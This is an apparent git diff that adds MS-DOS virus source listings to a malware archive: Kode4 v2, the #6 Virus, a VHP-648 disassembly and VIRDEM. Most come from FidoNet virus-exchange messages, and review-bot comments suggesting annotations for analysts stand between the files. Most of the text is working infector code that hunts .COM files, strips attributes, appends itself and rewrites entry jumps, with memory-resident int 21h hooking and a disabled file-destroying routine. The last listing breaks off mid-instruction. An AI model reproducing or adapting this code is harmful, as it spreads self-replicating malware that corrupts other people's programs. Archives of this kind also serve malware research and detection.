+;* Subj : KOD4_399.ASM
+;
+;@RFC-Path:
+;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
+;18.n283!not-for-mail
+;@RFC-Return-Receipt-To: Mark.Hapershaw@f718.n283.z2.fidonet.org
+;>>> Article From Evolution #2 - YAM '92
+;
+;Article Title: Kode 4 v2 Virus
+;Author: Soltan Griss
+
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+V_Length equ vend-vstart
+KODE4 proc far
+start label near
+ db 0E9h,00h,00h
+
+
+vstart equ $
+
+ mov si,100h ;get si to point to 100
+ mov di,102h ;get di to point to 102
+lback: inc di ;increment di
+ mov ax,word ptr [si] ;si is ponting to ax
+ cmp word ptr [di],ax ;compare ax with di loc
+ jne lback ;INE go back and inc di
+
+
+ mov ax,word ptr [si+1]
+ cmp ax,word ptr [di+1]
+ je lout
+ jmp lback
+
+lout: add di,3h ;jmp stored in the end
+ sub di,(v_length+100h) ;+3 to get to end and -
+ mov si,di ;
+;**********************************************************************
+;*
+;* The above code can be re-written as follows...
+;* The above idea, although it works is very long in code....
+;* when DOS does a load and execute it pushes all registers the last
+;* register to be pushed contains the file length.
so just subtract +;* the current location +;********************************************************************** +; +; +; +;Host_Off: pop bp +; sub bp,offset host_off +; mov si,bp +; +;*** Before opening any file copy the original three bytes back to 100h +;*** Because they will get overwritten when you check any new files + lea di,temp_buff + add di,si + mov ax,word ptr [di] + mov cl,byte ptr [di+2] + mov di,100h + mov word ptr [di],ax + mov byte ptr [di+2],cl + + + mov ah,4Eh ;Find first Com file + mov dx,offset filename ; offset of "*.com" + add dx,si + int 21h + jnc back + jmp done +Back: + mov ah,43h ;get rid of read only + mov al,0 + mov dx,9eh + int 21h + mov ah,43h + mov al,01 + and cx,11111110b + int 21h + + mov ax,3D02h ;Open file for read/writing + mov dx,9Eh ;get file name from file DTA + int 21h + jnc next + jmp done +next: mov bx,ax ;save handle in bx + mov ah,57h ;get time date + mov al,0 + int 21h + + push cx ;put in stack for later + push dx + + mov ax,4200h ; Move ptr to start of file + xor cx,cx + xor dx,dx + int 21h + + + mov ah,3fh ;load first 3 bytes + mov cx,3 + + mov dx,offset temp_buff + add dx,si + int 21h + + xor cx,cx ;move file pointer to end of file + xor dx,dx + mov ax,4202h + int 21h + sub ax,3 ; Fix for real location + push ax + ; nop ; + ; nop ; used for debugging + ; nop ; + ; nop ; + ; nop + + mov di,offset temp_buff + add di,si + mov word ptr [j_code2+si],ax; Save two bytes in a + ; word [jumpin] + + cmp byte ptr [di],0e9h ;look for a jmp at begining + jne infect + + mov cx,word ptr [di+1] ;check for XXX bytes at end + pop ax + sub ax,v_length + cmp ax, cx ; jump (id string to check) + jne infect + jmp finish + + + +infect: + + xor cx,cx ;move file pointer to begining + xor dx,dx ;to write jump + mov ax,4200h + int 21h + + mov ah,40h ;write jump in first 3 bytes + mov cx,3 + mov dx, offset j_code1 + add dx,si + int 21h + + xor cx,cx ;move file pointer to end of file + xor dx,dx + mov ax, 4202h + int 21h + + mov dx,offset 
vstart + add dx,si ;Start writing at top of virus + mov cx,(vend-vstart) ; Set for length of virus + mov ah,40h ;Write Data into the file + int 21h + + +Finish: pop dx ;Restore old dates and times + pop cx + mov ah,57h + mov al,01h + int 21h + + mov ah,3Eh ;Close the file + int 21h + + mov ah,4Fh ;Find Next file + int 21h + jc done + jmp back + +done: + mov bp,100h + jmp bp + + +filename db "*.com",0 +DATA db " -=+ Kode4 +=-, The one and ONLY!$" + +j_code1 db 0e9h +j_code2 db 00h,00h +temp_buff db 0cdh,020h,090h ; CD 20 NOP +kode4 endp + +vend equ $ + +seg_a ends + + end start + +;-+- WM v2.09/91-0245 +; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/3 Enable 32-bit processing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir64.asm b/MSDOS/Virus.MSDOS.Unknown.vir64.asm new file mode 100644 index 00000000..f6edbaf0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir64.asm 
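Review bot: The `DATA db " -=+ Kode4 +=-, The one and ONLY!$"` definition at the end of the listing is not referenced by any instruction (every `offset` in the code names `filename`, `temp_buff`, `j_code1`/`j_code2` or `vstart`), so a reader cannot tell whether it is dead data or an intentional identifying string. A one-line comment such as `; unreferenced; identifying text string only` would settle that, and the string is also the most stable static indicator an analyst has for this sample. The commented-out `; nop ; used for debugging` lines inside `next:` deserve a similar note saying they are development leftovers, since the listing otherwise reads as if they belong to the on-disk layout.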
@@ -0,0 +1,395 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 49 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : NUMBER_6.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Ron Toler, 2:283/718 (06 Nov 94 17:56) +;* To : Fred Lee +;* Subj : NUMBER_6.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org +;***************************************************************************** +; #6 Virus * +; * +; Assembled with Tasm 2.5 * +; (c) 1992 Trident/Dark Helmet, The Netherlands * +; * +; The author(s) take(s) no responsibility for any damaged caused by * +; this virus. * +;***************************************************************************** + + .RADIX 16 +virus SEGMENT + MODEL SMALL + ASSUME cs:virus, ds:virus, es:virus + ORG 100h + +len EQU OFFSET last - begin + +dummy: DB 0e9h,02h,00h,86h,54h ; Jump to start of + ; viruscode. +begin: CALL start ; make a call to + ; push the IP on the + ; stack. +start: POP bp ; get the IP of the + ; stack. + SUB bp,108h ; adjust BP (=IP) + ; for offset of DATA. + +restore: MOV di,0100h ; copy the original + LEA si,ds:[carrier_begin+bp] ; host begin code back. + MOV cx,05h + REP MOVSB + +check: MOV ah,0a0h ; check if virus + INT 21h ; allready resident. + CMP ax,8654h + JE end_virus + +memory: MOV ax,cs ; DS = Memory Control + DEC ax ; Blok (MCB). + MOV ds,ax + CMP BYTE PTR ds:[0000],5ah ; check first byte if + JNE abort ; last MCB. + MOV ax,ds:[0003] ; decrease memory size. + SUB ax,40 + MOV ds:[0003],AX + + PUSH cs ; restore ds. + POP ds + +install: MOV bx,ax ; ES point where + MOV ax,es ; to copy virus in + ADD ax,bx ; memory. + MOV es,ax + + MOV cx,len ; copy virus to + LEA si,ds:[begin+bp] ; memory. 
+ LEA di,es:0105 ; offset = 105 + REP MOVSB + MOV [virus_segment+bp],es ; store virus_segment + + PUSH cs ; restore es + POP es + +hook_vectors: CLI + + MOV ax,3521h ; hook int 21h + INT 21h + MOV ds,[virus_segment+bp] + MOV old_21h,bx + MOV old_21h+2,es + MOV dx,offset main_virus + MOV ax,2521h + INT 21h + + MOV ax,3512h ; hook int 12h + INT 21h + MOV old_12h,bx + MOV old_12h+2,es + MOV dx,offset new_12h + MOV ax,2512h + INT 21h + + STI + +abort: MOV ax,cs ; restore ds,es + MOV ds,ax + MOV es,ax + +end_virus: MOV bx,0100h ; jump to begin host + PUSH bx + XOR bx,bx + XOR bp,bp + XOR ax,ax + XOR cx,cx + RET + +;***************************************************************************** +; * +; This part will intercept the interuptvectors and copy itself to * +; other host programs * +; * +;***************************************************************************** + +main_virus: PUSHF + CMP ah,0a0h ; check if virus calls + JNE new_21h ; and return id. + MOV ax,8654h + POPF + IRET + +new_21h: PUSH ds ; new interupt 21 + PUSH es ; routine + PUSH di + PUSH si + PUSH ax + PUSH bx + PUSH cx + PUSH dx + PUSH sp + PUSH bp + +check_open: CMP ah,3dh ; check if a file is + JNE check_exec ; being opened + JMP chk_com + +check_exec: CMP ax,04b00h ; check if a file is + JNE continu ; executed + JMP chk_com + +continu: POP bp + POP sp + POP dx ; continu with + POP cx ; interrupt + POP bx + POP ax + POP si + POP di + POP es + POP ds + POPF + JMP DWORD PTR cs:[old_21h] + +chk_com: MOV cs:[name_seg],ds + MOV cs:[name_off],dx + CLD ; check if extension + MOV di,dx ; is COM file + PUSH ds + POP es + MOV al,'.' 
+ REPNE SCASB + CMP WORD PTR es:[di],'OC' + JNE continu + CMP WORD PTR es:[di+2],'M' + JNE continu + + CMP WORD PTR es:[di-7],'MO' ; Check for + JNE error ; COMMAND.COM + CMP WORD PTR es:[di-5],'AM' + JNE error + CMP WORD PTR es:[di-3],'DN' + JE continu + +error: CALL int24h ; take care of error + ; messages + CALL set_atribute ; set atribute for + ; writing + +open_file: MOV ds,cs:[name_seg] ; open file + MOV dx,cs:[name_off] + MOV ax,3d02h + CALL do_int21h + JC close_file + PUSH cs + POP ds + MOV [handle],ax + MOV bx,ax + + CALL get_date + +check_infect: PUSH CS ; check if file + POP DS ; already infect + MOV BX,[handle] + MOV ah,3fh + MOV cx,05h + LEA dx,[carrier_begin] + CALL do_int21h + MOV al, BYTE PTR [carrier_begin]+3 ; look for + MOV ah, BYTE PTR [carrier_begin]+4 ; identification byte's + CMP ax,[initials] + JE save_date + +get_lenght: MOV ax,4200h + CALL move_pointer + MOV ax,4202h + CALL move_pointer + SUB AX,03h + MOV [lenght_file],ax + + CALL write_jmp ; write jump + ; instruction. + CALL write_virus ; write virus + ; body. 
+ +save_date: PUSH CS + POP DS + MOV bx,[handle] + MOV dx,[date] + MOV cx,[time] + MOV ax,5701h + CALL do_int21h + +close_file: MOV bx,[handle] ; close file + MOV ah,3eh + CALL do_int21h + +restore_int24h: MOV dx,cs:[old_24h] ; restore int24 + MOV ds,cs:[old_24h+2] ; for critical + MOV ax,2524h ; error handling + CALL do_int21h + + JMP continu + +new_24h: MOV al,3 + IRET + +new_12h: JMP DWORD PTR cs:[old_12h] + SUB ax,50 + IRET + +;***************************************************************************** + +move_pointer: PUSH cs + POP ds + MOV bx,[handle] + XOR cx,cx + XOR dx,dx + CALL do_int21h + RET + +do_int21h: PUSHF + CALL DWORD PTR cs:[old_21h] + RET + +write_jmp: PUSH CS + POP DS + + MOV ax,4200h ; write jump + CALL move_pointer ; instruction + MOV ah,40h + MOV cx,01h + LEA dx,[jump] + CALL do_int21h + + MOV ah,40h ; write offset of + MOV cx,02h ; jump + LEA dx,[lenght_file] + CALL do_int21h + + MOV ah,40h ; write mark for + MOV cx,02h ; infection + LEA dx,[initials] + CALL do_int21h + RET + +write_virus: PUSH CS + POP DS + + MOV ax,4202h ; write main + CALL move_pointer ; virus body + MOV ah,40 ; at end of + MOV cx,len ; program + MOV dx,105h + CALL do_int21h + RET + +get_date: MOV ax,5700h + CALL do_int21h + PUSH cs + POP ds + MOV [date],dx + MOV [time],cx + RET + +int24h: MOV ax,3524h + CALL do_int21h + MOV cs:[old_24h],bx + MOV cs:[old_24h+2],es + MOV dx,offset new_24h + PUSH CS + POP DS + MOV AX,2524h + +; * Message split, to be continued * +;-+- GEcho 1.00 +; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/d Warn if duplicate symbols in libraries +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. 
 (2:5030/136)
+
+; PVT.VIRII (2:465/65.4) PVT.VIRII
+; Msg : 50 of 54
+; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
+; To : - *.* - Fri 11 Nov 94 08:10
+; Subj : [part 2] NUMBER_6.ASM
+;
+;.RealName: Max Ivanov
+;
+;* Kicked-up by MeteO (2:5030/136)
+;* Area : VIRUS (Int: p p)
+;* From : Ron Toler, 2:283/718 (06 Nov 94 17:56)
+;* To : Fred Lee
+;* Subj : [part 2] NUMBER_6.ASM
+;
+;@RFC-Path:
+;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
+;18.n283!not-for-mail
+;@RFC-Return-Receipt-To: Ron.Toler@f718.n283.z2.fidonet.org
+; * Continuation 1 of a split message *
+
+ CALL do_int21h
+ RET
+
+set_atribute: MOV ax,4300h ; get atribute
+ MOV ds,cs:[name_seg]
+ MOV dx,cs:[name_off]
+ CALL do_int21h
+
+ AND cl,0feh ; set atribute
+ MOV ax,4301h
+ CALL do_int21h
+ RET
+
+;*****************************************************************************
+
+text db '#6 Virus, Trident/The Netherlands 1992'
+old_12h dw 00h,00h
+old_21h dw 00h,00h
+old_24h dw 00h,00h
+carrier_begin db 090h,0cdh,020h,086h,054h
+jump db 0e9h
+name_seg dw ?
+name_off dw ?
+virus_segment dw ?
+handle dw ?
+lenght_file dw ?
+date dw ?
+time dw ?
+initials dw 5486h
+last db 090h
+
+virus ends
+ end dummy
+
+;-+- GEcho 1.00
+; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718)
+;=============================================================================
+;
+;Yoo-hooo-oo, -!
+;
+;
+; The MeeO
+;
+;/dSYM[=VAL] Define symbol SYM = 0, or = value VAL
+;
+;--- Aidstest Null: /Kill
+; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136)
+
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.virbub.asm b/MSDOS/Virus.MSDOS.Unknown.virbub.asm
new file mode 100644
index 00000000..9b4e2fc8
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.virbub.asm
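Review bot: The `int24h:` routine is cut in two by the FidoNet message boundary — its first instructions sit before the `; * Message split, to be continued *` tearline and its closing `CALL do_int21h` / `RET` only appear after the second message header and the `; * Continuation 1 of a split message *` line, so a reader following the listing will take the tearline as the end of the routine. A comment on the continuation line, `; int24h continues here (listing spans two messages)`, would make the join explicit. The data block would also benefit from a note that `initials dw 5486h` is both the value compared at `check_infect` and the word `write_jmp` stores after the jump opcode and offset, i.e. the sample's on-disk self-identification constant, which is the value an analyst checks for when triaging a suspect file.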
@@ -0,0 +1,331 @@ + name Virus + title Disassembly listing of the VHP-648 virus + .radix 16 +code segment byte public + assume cs:code,ds:code,es:code + org 100h +environ equ 2C + +start: + jmp virus + +message db 'Hello, world!$' + + mov ah,9 + mov dx,offset message + int 21 + int 20 + +virus: + push cx ;Save CX + + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ; before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov word ptr [si+0],bx ;dtaadr + mov word ptr [si+2],es + pop es ;Restore ES + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + mov di,0 +n_00015A: ;Search 'PATH' in environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repnz scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+16],di ;Save 'PATH' offset in poffs + mov di,si + add di,fname-data ;Point SI & DI at '=' sign + mov bx,si ;Point BX at data area + add si,fname-data + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+16],6C ;poffs + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+16] ;poffs + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + mov si,0 +n_0001B0: + pop bx + pop ds + mov [bx+16],si ;poffs + cmp byte 
ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+18],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cx,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cx,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+75] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + cmp [si+79],64000d ;Is file size greather than 64,000 bytes? + ja findnext ;If so, search for next file + cmp word ptr [si+79],10d ;Is file size less than 10 bytes? + jb findnext ;If so, search for next file + + mov di,[si+18] ;eqoffs + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+8],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + +;The next `db's are there because MASM can't assemble +; the instruction `and cx,0FFFE' correctly (the fool!): + + db 081,0E1,0FE,0FF +; and cx,word ptr (not 1) ;Turn off Read Only flag + mov dx,fname-data + add dx,si + int 21 + + mov ax,3D02 ;Open file with Read/Write access + mov dx,fname-data + add dx,si + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+4],cx ;Save time in ftime + mov [si+6],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + +;If so, destroy file (don't contaminate). 
Now this code is disabled. + jnz 010 + jmp short n_000266 ;CHANGED. Was jnz here + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + mov cx,0 ;0 bytes from end + mov dx,0 + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer + sub ax,3 ;Subtract 3 from it to get real code size + mov [si+14d],ax ;Save result in filloc + add cx,data-(virus-100) + mov di,si + sub di,data-modify ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,enddata-virus ;Virus code length as bytes to be written + mov dx,si + sub dx,data-virus ;Now DX points at virus label + int 21 + jc oldtime ;Exit on error + cmp ax,enddata-virus ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + mov cx,0 ;Just at the file beginning + mov dx,0 + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cx,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+6] ;Restore file date + mov cx,[si+4] ; and time + +;And these again are due to the MASM 5.0 foolness: + + db 081,0E1,0E0,0FF + db 081,0C9,01F,000 +; and cx,not 11111b +; or cx,11111b ;Set seconds to 62 (?!) 
+ + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+8] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+0] ;Restore saved DTA + mov ds,[si+2] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 0EBh,0Fh,90 ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +filloc dw ? ;File pointer is saved here +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file: + +bad_jmp db 0EA,0Bh,2,13,58 +enddata label byte + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.virdem.asm b/MSDOS/Virus.MSDOS.Unknown.virdem.asm new file mode 100644 index 00000000..af363036 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.virdem.asm 
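Review bot: The `;Set seconds to 62 (?!)` comment on the `db 081,0C9,01F,000` bytes in `oldtime:` leaves the purpose unexplained, even though the listing itself shows it: the search loop at `n_0001E7` masks the time field with `and al,11111b`, compares it against `62d/2` and skips any file that already carries that value, so the impossible 62-second timestamp is the sample's infection marker. Replacing the `(?!)` with `;Infection marker: files whose time field reads 62 s are skipped at n_0001E7` ties the two sites together and documents the timestamp anomaly a defender can look for in a directory listing. The hand-encoded `db 081,0E1,...` sequences already carry their intended mnemonics in adjacent comments, which is the right way to present raw bytes in a listing.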
@@ -0,0 +1,487 @@ +; +; +; VIRDEM +; +; Created: 16-Mar-87 +; Version: +; Passes: 5 Analysis Options on: QRS +; Copyright by R.Burger 1986,1987 +; +; + +data_1e equ 80h ; (8C04:0080=0) +data_2e equ 9Eh ; (8C04:009E=0) +data_16e equ 0F800h ; (8C04:F800=0) +data_17e equ 0FD00h ; (8C04:FD00=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +virdem proc far + +start: + nop + nop + nop + mov sp,0FE00h + push ax + push bx + push cx + push dx + push bp + push si + push di + push ds + push es + push ss + pushf ; Push flags + mov si,data_1e ; (8C04:0080=0) + lea di,cs:[3BFh] ; Load effective addr + mov cx,20h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,0 + mov es:data_5,ax ; (8C04:038F=0) + mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h) + cmp bl,39h ; '9' + je loc_1 ; Jump if equal + inc bl +loc_1: ; xref 8C04:012C + mov byte ptr es:data_12+0Dh,bl ; (8C04:0422=30h) + + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov cs:data_10,al ; (8C04:03E1=0) + mov ah,47h ; 'G' + mov dh,0 + add al,1 + mov dl,al + lea si,cs:[3E3h] ; Load effective addr + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + jmp short loc_3 ; (016D) + db 90h +loc_2: ; xref 8C04:0191, 01A0 + mov ah,40h ; '@' + mov bx,1 + mov cx,34h + nop + lea dx,cs:[57Ch] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov dx,cs:data_6 ; (8C04:0391=600h) + mov cs:data_17e,dx ; (8C04:FD00=0) + jmp loc_12 ; (02E4) + jmp loc_12 ; (02E4) +loc_3: ; xref 8C04:014B + mov dl,0 + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + mov ah,3Bh ; ';' + lea dx,cs:[3DFh] ; Load effective addr + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + jmp short loc_7 ; (01C9) + db 90h +loc_4: ; xref 8C04:01D4, 01E7 + mov ah,3Bh ; ';' + lea dx,cs:[3DFh] ; Load effective addr + int 21h ; DOS Services ah=function 3Bh + ; set current 
dir, path @ ds:dx + mov ah,4Eh ; 'N' + mov cx,11h + lea dx,cs:[399h] ; Load effective addr + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_2 ; Jump if carry Set + mov bx,cs:data_5 ; (8C04:038F=0) + inc bx + dec bx + jz loc_6 ; Jump if zero +loc_5: ; xref 8C04:01A3 + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_2 ; Jump if carry Set + dec bx + + jnz loc_5 ; Jump if not zero +loc_6: ; xref 8C04:019A + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + add bx,1Ch + mov word ptr es:[bx],5C20h + inc bx + push ds + mov ax,es + mov ds,ax + mov dx,bx + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx + pop ds + mov bx,cs:data_5 ; (8C04:038F=0) + inc bx + mov cs:data_5,bx ; (8C04:038F=0) +loc_7: ; xref 8C04:017B + mov ah,4Eh ; 'N' + mov cx,1 + lea dx,cs:[393h] ; Load effective addr + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_4 ; Jump if carry Set + mov bx,es:data_5 ; (8C04:038F=0) + cmp bx,0 + je loc_8 ; Jump if equal + jmp short loc_9 ; (01E9) + db 90h +loc_8: ; xref 8C04:01DE, 020D + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jc loc_4 ; Jump if carry Set +loc_9: ; xref 8C04:01E0 + mov ah,3Dh ; '=' + mov al,2 + mov dx,data_2e ; (8C04:009E=0) + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ah,3Fh ; '?' 
+ mov cx,500h + nop + mov dx,data_16e ; (8C04:F800=0) + nop + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + mov bx,cs:data_16e ; (8C04:F800=0) + cmp bx,9090h + je loc_8 ; Jump if equal + mov ah,43h ; 'C' + + mov al,0 + mov dx,data_2e ; (8C04:009E=0) + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov ah,43h ; 'C' + mov al,1 + and cx,0FEh + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + mov ah,3Dh ; '=' + mov al,2 + mov dx,data_2e ; (8C04:009E=0) + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ah,57h ; 'W' + mov al,0 + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + push cx + push dx + mov ah,42h ; 'B' + mov al,2 + mov dx,0 + mov cx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + test ax,8000h + jnz loc_10 ; Jump if not zero + cmp ax,500h + nop + ja loc_10 ; Jump if above + call sub_3 ; (0380) +loc_10: ; xref 8C04:0244, 024A + push ax + push dx + mov ah,40h ; '@' + mov cx,500h + nop + mov dx,data_16e ; (8C04:F800=0) + nop + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + pop dx + pop ax + add ax,100h + mov es:data_4,ax ; (8C04:02BD=0) + add ax,500h + nop + mov dx,cs:data_6 ; (8C04:0391=600h) + mov cs:data_17e,dx ; (8C04:FD00=0) + mov es:data_6,ax ; (8C04:0391=600h) + mov ah,40h ; '@' + mov cx,38h + nop + lea dx,cs:[287h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + + ; write file cx=bytes, to ds:dx + jmp short loc_11 ; (02C0) + db 90h + db 0BFh, 80h, 00h, 8Dh, 36h,0BFh + db 03h,0B9h, 20h, 00h,0F3h,0A4h + db 0E8h, 00h, 00h + +virdem endp + +; +; SUBROUTINE +; + +sub_1 proc near + pop ax + mov bx,27h + nop + add ax,bx + mov si,ax + mov bx,es:[si] + mov si,bx + mov di,offset ds:[100h] ; (8C04:0100=90h) + mov cx,500h + nop + rep movsb ; Rep when cx >0 Mov 
[si] to es:[di] + popf ; Pop flags + pop ss + pop es + pop ds + pop di + pop si + pop bp + pop dx + pop cx + pop bx + pop ax + mov ax,offset start + push ax + ret +sub_1 endp + +data_4 dw 0 ; xref 8C04:0262 + db 90h +loc_11: ; xref 8C04:0284 + mov ah,42h ; 'B' + mov al,0 + mov dx,0 + mov cx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov ah,40h ; '@' + mov cx,500h + nop + lea dx,cs:[100h] ; Load effective addr + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ah,57h ; 'W' + + mov al,1 + pop dx + pop cx + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_12: ; xref 8C04:0167, 016A + nop + call sub_2 ; (036E) + mov bl,byte ptr es:data_12+0Dh ; (8C04:0422=30h) + cmp bl,31h ; '1' + jne loc_13 ; Jump if not equal + mov ah,40h ; '@' + mov 